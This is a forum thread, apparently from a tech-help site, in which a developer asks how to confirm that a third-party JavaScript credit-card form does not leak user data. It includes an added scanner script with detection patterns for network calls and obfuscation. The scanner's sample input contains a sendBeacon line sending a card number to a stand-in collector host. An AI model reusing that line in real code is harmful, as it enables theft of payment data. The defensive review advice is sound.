How can I check the JS code, if the JS code inside my page posts or requests any data without my knowledge?

BR
Dear Experts,
I use PHP 7.2 and MySQL 5.6.

I found an open source HTML-JavaScript (HTML-JS) form on GitHub, which could work perfectly fine for me.

The link is here: https://github.com/jessepollak/card
I used the JavaScript version of this form.

This is a credit card form. It's a very useful form. However, I'm new to JS and I know that data can be manipulated with JS.
It can be posted without my knowledge with JS or jQuery, and credit card information is very sensitive data, as you can imagine.

I checked the JS file; I didn't see any part that POSTs data or any other 3rd party links. How can I be sure that the form is safe and does not send or post any of my users' data?

Thank you
leakim971 (Multitechnician)
Top Expert 2014
Commented:
Looking at the code, you should see strange data representing an address, a target URL.
You can also check network activity using a web browser, for example Chrome: https://developers.google.com/web/tools/chrome-devtools/network/
Most Valuable Expert 2017
Distinguished Expert 2018
Commented:
Leak's suggestion is good - run the code and check your Network console to see if it triggers any activity.
You have examined the code as well - check for any obfuscation - code that you cannot easily read. While doing this check the scroll bars on the editor - make sure there is no code hiding off screen.

Finally, check the GitHub stats.
10K stars with 1K forks - says this is an active bit of code. If it were untrustworthy then those stats would not look like that.

Also check the issues section - look for comments in there that might indicate problems with the plugin.

None of the above should qualify as a safety check on its own - you should do all of them as part of your security check.

And finally don't use a remote link for the code - download a version that you have checked and then use that from your server. That way you know that the code on the link won't be tampered with.
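
A static first pass over the downloaded file, covering the checks suggested in the answers above: network-capable calls, hard-coded target URLs, obfuscation, and code pushed off screen on very long lines. This is an added example, not part of the original thread or of the card project; the pattern lists, the `scanScript` function and the sample input are assumptions made for illustration.

```javascript
// Added example: heuristic static review of a third-party script.
// The pattern lists below are assumptions (a starting point, not exhaustive).
const NETWORK_SINKS = [
  ['fetch', /\bfetch\s*\(/],
  ['XMLHttpRequest', /\bXMLHttpRequest\b/],
  ['sendBeacon', /\bsendBeacon\s*\(/],
  ['WebSocket', /\bWebSocket\b/],
  ['jQuery ajax', /\$\.(ajax|post|get|getJSON)\s*\(/],
  ['image beacon', /new\s+Image\b/],
  ['form submit', /\.submit\s*\(/],
];
const OBFUSCATION = [
  ['eval', /\beval\s*\(/],
  ['Function constructor', /\bnew\s+Function\s*\(/],
  ['atob', /\batob\s*\(/],
  ['fromCharCode', /String\.fromCharCode/],
  ['escape run', /(\\x[0-9a-fA-F]{2}){4,}|(\\u[0-9a-fA-F]{4}){4,}/],
];
const URL_RE = /\b(?:https?|wss?):\/\/[^\s'"`)]+/g;

// Returns one finding per hit: { line, kind, detail }.
function scanScript(source, maxLineLength = 200) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    const line = i + 1;
    for (const [name, re] of NETWORK_SINKS)
      if (re.test(text)) findings.push({ line, kind: 'network', detail: name });
    for (const [name, re] of OBFUSCATION)
      if (re.test(text)) findings.push({ line, kind: 'obfuscation', detail: name });
    for (const url of text.match(URL_RE) || [])
      findings.push({ line, kind: 'url', detail: url });
    // Very long lines are where code "hides off screen" in an editor.
    if (text.length > maxLineLength)
      findings.push({ line, kind: 'long-line', detail: `${text.length} chars` });
  });
  return findings;
}

// Constructed sample input (not taken from the card project).
const SAMPLE = [
  'function formatCard(n) { return n.replace(/\\s+/g, ""); }',
  'var t = atob("Y29uc3RydWN0ZWQ=");',
  ' '.repeat(300) + 'new Image().src = t;',
  'navigator.sendBeacon("https://collector.example.invalid/c", n);',
].join('\n');

for (const f of scanScript(SAMPLE))
  console.log(`line ${f.line}: [${f.kind}] ${f.detail}`);
```

Each finding is a prompt to read that line by hand. An empty result does not clear the file, so the Network tab check still applies.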
BR (Digital Marketing)

Author

Commented:
Thank you both.
